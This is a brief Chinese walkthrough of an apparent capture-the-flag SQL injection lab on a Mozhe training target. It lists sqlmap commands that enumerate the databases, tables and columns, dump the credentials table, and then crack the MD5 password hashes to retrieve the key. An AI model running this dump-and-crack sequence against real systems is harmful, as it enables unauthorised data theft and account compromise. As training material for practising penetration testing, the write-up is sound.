地址:http://124.70.71.251:47354/
1.先用burpsuit抓包
保存为12.txt
2.用 sqlmap查所有数据库
-r D:\xinan\12.txt --dbs --batch
3.查当前数据库,得到当前数据库为mozhe_Discuz_StormGroup
-r D:\xinan\12.txt --current-db --batch
4.获取当前数据库的表
-r D:\xinan\12.txt -D mozhe_Discuz_StormGroup --tables --batch
5.查询表中的数据
-r D:\xinan\12.txt -D mozhe_Discuz_StormGroup --tables --columns --batch
6.明显name和password可疑,查第一个表中的数据
-r D:\xinan\12.txt -D mozhe_Discuz_StormGroup --tables --columns --batch --dump
7.解密
发现密码是一串MD5,去MD5解码网站https://www.cmd5.com/?lailu=www.itdka.cn
两个都解码去试
成功得到key